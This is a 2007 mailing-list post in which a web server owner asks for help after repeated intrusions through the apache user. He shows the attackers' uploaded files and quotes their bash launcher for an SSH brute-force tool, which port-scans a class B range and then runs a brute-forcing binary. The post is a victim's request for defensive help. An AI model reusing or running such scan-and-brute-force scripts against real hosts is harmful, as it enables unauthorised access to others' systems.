[ubuntu-uk] off topic - server security

[Sean Miller]

I am aware this isn't Ubuntu related, but I'm tearing my hair out.

For the past week or so some folks have been constantly hacking my
webserver... it's running Cent-OS I believe, but I don't have the knowledge
to work out how they're getting in.

I've changed the SSH port from 22, have run rkhunter and that shows nothing
but every time I leave the thing for 3-4 hours there's loads of dodgy
processes running and the httpd has died.  The processes are always running
as "apache", so clearly it's the webserver and/or php and whatever which is
being compromised.

What's the insecurity that I can't figure out?  Anybody have any ideas?

Here's an example of the sort of stuff they upload...

[root at s15247463 ssh]# ls -l
total 1668
-rwxr-xr-x  1 apache apache     307 Jul 29  2005 a
-rwxr-xr-x  1 apache apache    7143 Jun 28 14:24 mass
-rwxr-xr-x  1 apache apache    4815 Dec 13  2005 nobash.txt
-rwxr-xr-x  1 apache apache  273836 Dec 19  2005 pass.txt
-rwxr-xr-x  1 apache apache    5944 May 15  2005 pscan2
-rwxr-xr-x  1 apache apache    5797 May 15  2005 pscan2.c
-rwxr-xr-x  1 apache apache     307 Jul 29  2005 scan
-rw-r--r--  1 apache apache       0 Dec 27 07:18 scan.log
-rwxr-xr-x  1 apache apache 1384518 Jun  5  2005 sshd
-rwxr-xr-x  1 apache apache     106 Dec 12  2005 vuln.txt

#!/bin/bash
#
# by lizard
#

if [ $# != 1 ]; then
        echo " usage: $0 <b class>"
        exit;
fi

rm -rf scan.log

echo -e "A little ssh bruteforce tool\n\r\t - by andr & Ick\n\n"
echo
echo
sleep 1
././pscan2 $1 22
echo "[+] Alright.. bruteforcing..."
./sshd 100
echo "[+] Sleeping 10 secs"
sleep 10



Sean
-------------- next part --------------
An HTML attachment was scrubbed...
URL: https://lists.ubuntu.com/archives/ubuntu-uk/attachments/20071227/eb18fadd/attachment.htm